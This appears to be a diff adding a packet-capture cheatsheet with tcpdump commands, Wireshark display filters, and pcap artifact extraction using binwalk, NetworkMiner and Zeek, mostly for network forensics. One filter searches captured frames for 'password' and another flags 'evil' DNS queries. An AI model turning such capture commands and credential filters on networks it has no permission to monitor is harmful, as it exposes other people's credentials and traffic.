+sudo tcpdump -i <interface> net <network_cidr>
+
+# tcpdump - verbose with hex
+sudo tcpdump -i <interface> -XX -vv
+
+# tcpdump - no DNS resolution
+sudo tcpdump -i <interface> -n
+
+# Common Wireshark display filters:
+# ip.addr == 192.168.1.1
+# tcp.port == 443
+# http.request.method == "POST"
+# dns.qry.name contains "evil"
+# tcp.flags.syn == 1 and tcp.flags.ack == 0
+# frame contains "password"
+# ssl.handshake.type == 1
+
+# Extract files from pcap with binwalk
+binwalk -e <pcap_file>
+
+# NetworkMiner (GUI) - extract artifacts
+networkminer <pcap_file>
+
+# Zeek - generate logs from pcap
+zeek -r <pcap_file>
+
+$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
+$ pcap_file: find . -name "*.pcap" -o -name "*.pcapng" 2>/dev/null
+$ output_pcap: echo "capture.pcap"
+$ ip: echo ""
+$ port: echo "80\n443\n22\n21\n53"
+$ network_cidr: echo "192.168.1.0/24"
+$ stream_number: echo "0"
+$ output_dir: echo "extracted"